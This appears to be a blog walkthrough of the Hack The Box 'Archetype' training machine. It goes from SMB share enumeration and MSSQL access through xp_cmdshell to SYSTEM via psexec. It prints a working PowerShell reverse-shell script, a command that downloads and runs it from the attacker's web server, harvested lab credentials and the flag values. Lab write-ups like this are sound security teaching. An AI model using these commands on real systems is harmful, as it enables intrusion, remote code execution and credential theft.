top of page
Search

Archetype

  • Admin
  • Aug 1, 2022
  • 4 min read

Enumeration


As always, let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Archetype)


The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

ree

We can see that port 445 is open which is usually associated with file sharing (SMB). So let's find out if we can list the shares available using:

smbclient -L IP
SMB authentication always require a username. If you don't specify one, it will use your VM username as default.

ree

When prompted for the password just press enter

ree

We can see there are 4 shares available. Let's check the first share called ADMIN$

smbclient \\\\IP\\ADMIN$
ree

When prompted for the password, just press enter.

ree

Access is denied.

Let's check the second share called backups:

smbclient \\\\IP\\backups
ree

When prompted for the password, just press enter.

ree

We got access to that share!

ls
ree

Let's download the file prod.dtsConfig to our VM

get prod.dtsConfig
ree
The get command will download the file to your current directory/home directory. Open your home directory and check the content of that file

ree

Looks like we found some credentials:

User ID=ARCHETYPE\sql_svc

Password=M3g4c0rp123


To exit the share, just type:

exit
ree

Let's move on. The nmap we used at the beginning also showed that port 1433 is open, which is usually associated with SQL server. Now that we have some credentials, we just need to find a way to connect and authenticate to the MSSQL server. Let's use Impacket's tool mssqlclient.py to do that. 

locate mssqlclient
ree

Let's change directory:

cd /usr/share/doc/python3-impacket/examples
ree
python3 mssqlclient.py
ree

This tells us that we need to type: username@targetIP

This also tells us that we need to add -windows-auth


python3 mssqlclient.py sql_svc@IP -windows-auth
ree

Type the password we found earlier:

Password=M3g4c0rp123

ree

We successfully authenticated to the Microsoft SQL server!

help
ree

Looks like we can use xp_cmdshell followed by the command we want to execute, using xp_cmdshell {cmd}


First, we need to enable it by typing enable_xp_cmdshell

enable_xp_cmdshell
ree

We are told to run the RECONFIGURE statement to install

RECONFIGURE
ree

Now we can use xp_cmshell followed by a command we want to execute:

xp_cmdshell whoami
ree

Now let's try to find out if we have sysadmin right by typing:

SELECT IS_SRVROLEMEMBER ('sysadmin')
ree

The output is 1 so it means we are part of the sysadmin group!




We just need to change 2 things from the script:

- The IP ---> this is the IP of your VM (the attackers' machine)

If you don't know your IP, open a new command prompt window and type ifconfig

- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Go to your Downloads folder and create a new file called shell.ps1

Open it and copy paste the script above, then save your file.


Now we need to get the target machine to go and download our PowerShell script shell.ps1


To do that, we will create a simple web server on our attacker's machine (our VM):


From your VM, open a new command prompt window and go to the Downloads directory:

cd Downloads
sudo python3 -m http.server 8080
ree

This command will start a web server in our current directory (as in in the Downloads directory)

Do not close this window! Otherwise it will stop your web server.


Open your browser and check that the website has been created

http://10.10.14.11:8080/
ree
10.10.14.11 is the IP of my VM - it will be different for you. Make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig


Now we need to install ufw (uncomplicated firewall) on our VM.

Open a new command prompt window and type

sudo apt install ufw
ree

sudo ufw enable
ree

We now need to add a rule so that the target machine can connect back to our attacker machine (our VM)

sudo ufw allow from 10.129.243.63 proto tcp to any port 8080,4444
ree

10.129.243.63 is the target machine

port 8080 because our webserver is on port 8080

port 4444 because we will start our netcat listener on port 4444



Now, still from your VM, open a new command prompt window and set up your netcat listener 

nc -lnvp 4444
ree

Only after you set up your netcat, go back to the target machine and type:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.11:8080/shell.ps1\");"
10.10.14.11 is the IP of my VM (attacker's machine) - The IP of your VM will be different. If you don't know the IP of your VP, open a new command prompt window and type ifconfig
ree


Go back to your netcat and you should have a connection:

ree

Type

whoami
ree

cd C:\Users
ree

dir
ree

cd sql_svc
ree

dir
ree

cd Desktop
ree

dir
ree

type user.txt
ree

3e7b102e78218e935bf3f4951fec21a3


You got the user flag! Congratulations!



It's always good to check the console history file where we can see the frequently accessed files and/or any executed commands. The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine


cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cat ConsoleHost_history.txt
ree

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!


We just found more credentials!


The net use or net.exe use command is used to show detailed information about currently mapped drives and devices. It is used this way:

net use           [{devicename | *}]      \\computername\sharename /user:username

devicename ---> Use this option to specify the Drive letter (here Drive letter T)

\\computername\sharename ---> specifies the name of the computer, computername, and the shared resource, sharename


More info on net use can be found at https://www.lifewire.com/net-use-command-2618096




Privilege Escalation


Impacket also has a tool called psexec.py and we can use this tool to connect to the server using the credentials we just found.


From your VM, open a new prompt window

locate psexec.py
ree

cd /usr/share/doc/python3-impacket/examples
ree

python3 psexec.py
ree

python3 psexec.py administrator@10.129.243.63

10.129.243.63 is the IP of the target machine

ree

Type the password we just found and press enter

MEGACORP_4dm1n!!


whoami
ree

We just escalated our privileges and we are now the nt authority\system


You can usually find the root flag at C:\Users\Administrator\Desktop

cd C:\Users\Administrator\Desktop
ree
dir
ree
type root.txt
ree

b91ccec3305e98240082d4474b848528


Congratulations! you got the root flag!

 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page